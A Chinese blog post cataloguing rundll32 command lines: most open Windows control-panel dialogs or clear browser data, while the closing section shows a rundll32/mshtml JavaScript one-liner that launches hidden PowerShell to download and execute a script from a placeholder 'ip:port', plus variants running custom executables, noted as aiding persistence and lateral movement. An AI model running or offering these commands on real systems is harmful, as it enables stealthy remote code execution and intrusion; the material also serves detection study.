关于rundll32

一.常规的dll调用

C:\WINDOWS\System32\rundll32 advpack.dll #12 C:\Users\xinxin\Desktop\ConsoleApplication1.exe //执行exe

ps：rundll32 advpack.dll, #-4294967284 C:\Users\xinxin\Desktop\ConsoleApplication1.exe

rundll32 advpack.dll RegisterOCX C:\Users\xinxin\Desktop\ConsoleApplication1.exe

C:\WINDOWS\System32\rundll32.exe devmgr.dll DeviceManager_Execute //设备管理

C:\WINDOWS\System32\rundll32.exe keymgr.dll,PRShowSaveWizardExW //忘记密码

C:\WINDOWS\System32\rundll32.exe keymgr.dll,KRShowKeyMgr //已经存储的用户名和密码

C:\WINDOWS\System32\rundll32.exe newdev.dll,DeviceInternetSettingUi //设备安装设置

C:\WINDOWS\System32\rundll32.exe powrprof.dll,SetSuspendState //电脑休眠

C:\WINDOWS\System32\rundll32.exe Printui.dll,PrintUIEntry /? //打印机用户界面

C:\WINDOWS\System32\rundll32.exe pwlauncher.dll,ShowPortableWorkspaceLauncherConfigurationUX //windows to go选项

C:\WINDOWS\System32\rundll32.exe shdocvw.dll,DoOrganizeFavDlg //收藏夹

C:\WINDOWS\System32\rundll32.exe shwebsvc.dll AddNetPlaceRunDll //添加网络位置向导

C:\WINDOWS\System32\rundll32.exe tcpmonui.dll,LocalAddPortUI //tcp，端口打印机添加

C:\WINDOWS\System32\rundll32.exe user32.dll,LockWorkStation //锁屏

C:\WINDOWS\System32\rundll32.exe user32.dll,SwapMouseButton //鼠标左右键交换，很恶心

C:\WINDOWS\System32\rundll32.exe InetCpl.cpl,ClearMyTracksByProcess 255 //清楚浏览器历史记录

C:\WINDOWS\System32\rundll32.exe InetCpl.cpl,ClearMyTracksByProcess 4351 //删除所有浏览历史和加载项历史

C:\WINDOWS\System32\rundll32.exe InetCpl.cpl,ClearMyTracksByProcess 2 //删除 cookie 和网站数据

C:\WINDOWS\System32\rundll32.exe InetCpl.cpl,ClearMyTracksByProcess 16834 //删除下载数据

C:\WINDOWS\System32\rundll32.exe InetCpl.cpl,ClearMyTracksByProcess 16 //删除表单数据

C:\WINDOWS\System32\rundll32.exe InetCpl.cpl,ClearMyTracksByProcess 32 //删除浏览器密码

C:\WINDOWS\System32\rundll32.exe InetCpl.cpl,ClearMyTracksByProcess 8 //删除临时 Internet 文件和网站文件

C:\WINDOWS\System32\rundll32.exe sysdm.cpl,EditEnvironmentVariables //环境变量

C:\WINDOWS\System32\rundll32.exe shell32.dll Control_RunDLL //控制面板

C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL HotPlug.dll //删除硬件

C:\WINDOWS\System32\rundll32.exe Shell32.dll,Control_RunDLL input.dll,,{C07337D3-DB2C-4D0B-9A93-B722A6C106E2} //文本服务和输入语言

C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL joy.cpl //游戏控制器

PS:当然，我们也可以直接使用control joy.cpl直接打开

也可以使用vbs文件（双击&&wscript //e:jscript joy.vbs）,js文件（wscript //e:jscript joy.js）

也可以使用

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("cmd /c c:\\windows\\system32\\joy.cpl",0,true)

C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL nusrmgr.cpl //控制面板->用户账户

C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL wscui.cpl //安全和维护

C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL NetSetup.cpl //配置无线路由器接入点

C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL inetcpl.cpl //浏览器属性

C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL main.cpl @1 //键盘属性

C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL main.cpl //鼠标属性

C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL ncpa.cpl //网络连接

C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL odbccp32.cpl //ODBC数据库管理

C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL Sysdm.cpl,,1 //系统属性，更改计算机名

C:\WINDOWS\System32\rundll32.exe Shell32.dll,Control_RunDLL cscui.dll,,0 //启用脱机文件

C:\WINDOWS\System32\rundll32.exe shell32.dll Control_RunDLL access.cpl //轻松使用设置中心

C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL srchadmin.dll //索引选项

C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL tabletpc.cpl //启用平板的笔

C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL powercfg.cpl //打开电源选项

C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL Mmsys.cpl,,0 //声音设置

C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,0 //程序和功能

C:\WINDOWS\System32\rundll32.exe shell32.dll Control_RunDLL firewall.cpl //打开防火墙

C:\WINDOWS\System32\rundll32.exe shell32.dll Control_RunDLL desk.cpl //打开系统显示

C:\WINDOWS\System32\rundll32.exe shell32.dll Control_RunDLL desk.cpl,,0 //桌面图标设置

C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL Intl.cpl,,0 //区域，时间设置

C:\WINDOWS\System32\rundll32.exe shell32.dll,Control_RunDLL C:\WINDOWS\System32\Speech\SpeechUX\sapi.cpl,,1 //语音文字转化

C:\WINDOWS\System32\rundll32.exe shell32.dll,Options_RunDLL 0 //文件资源管理器

C:\WINDOWS\System32\rundll32.exe shell32.dll,Options_RunDLL 2 //文件资源管理器选项

C:\WINDOWS\System32\rundll32.exe shell32.dll ShellAbout //关于电脑本机

C:\WINDOWS\System32\rundll32.exe shell32.dll SHHelpShortcuts_RunDLL AddPrinter //添加打印机

C:\WINDOWS\System32\rundll32.exe shell32.dll,SHHelpShortcuts_RunDLL FontsFolder //字体

C:\WINDOWS\System32\rundll32.exe shell32.dll,SHHelpShortcuts_RunDLL Connect //映射网络驱动器

C:\WINDOWS\System32\rundll32.exe shell32.dll,SHHelpShortcuts_RunDLL PrintersFolder //打印机列表

二.文件执行

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://ip:port/a'))") //执行powershell

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("cmd /c c:\\windows\\system32\\joy.cpl",0,true) //执行我们的cpl文件

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=javascript)"+(new%20ActiveXObject("WScript.Shell")).Run("ConsoleApplication1.exe")+"\74/script)") //执行我们的exe文件

当然，还有我们的-localserver以及-sta参数可以让我们更方便的权限维持或者横向移动

posted @ 2022-02-09 12:42 z珠穆朗玛鑫阅读(523) 评论(0) 编辑收藏举报

刷新页面返回顶部

z珠穆朗玛鑫

关于rundll32

公告